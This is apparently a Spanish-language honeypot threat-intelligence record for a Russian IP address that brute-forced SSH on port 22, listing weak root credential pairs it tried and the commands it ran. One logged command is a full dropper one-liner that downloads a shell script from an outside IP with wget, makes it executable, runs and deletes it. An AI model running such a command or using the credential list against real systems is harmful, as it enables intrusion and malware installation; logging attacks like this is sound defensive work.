Amenaza ActivaMEDIO

5.142.110.157

Pais de Origen🇷🇺 Rusia
Primera Deteccion21/2/2026
Ultima Actividad21/2/2026
ISPRostelecom
🎯
106
Ataques Totales
🔌
1
Puertos
📡
1
Tipos Ataque
🦠
3
Malware

Geolocalizacion

Pais
🇷🇺 Rusia
Ciudad
Kotlas
ASN
AS12389
ISP
Rostelecom

Tipos de Ataque

cowrie

Puertos Atacados

22

Malware Asociado

Credenciales Intentadas

🔐root/1234567890
1x
🔐root/user
1x
🔐root/test
1x
🔐root/111111
1x
🔐root/debian
1x
🔐root/12345
1x
🔐root/guest
1x
🔐root/centos
1x
🔐root/000000
1x
🔐root/1234
1x
🔐root/admin
1x
🔐root/root
1x
🔐root/123456
1x
🔐root/1234567
1x
🔐root/123123
1x

Comandos Ejecutados

$mount | head -51x
$cd /tmp || cd /var/run || cd /mnt || cd /root || cd /; wget http://45.95.146.23/mao_http.sh; chmod 777 mao_http.sh; sh mao_http.sh; rm -rf mao_http.sh1x

Evaluacion de Riesgo

50
/100
BajoMedioAltoCritico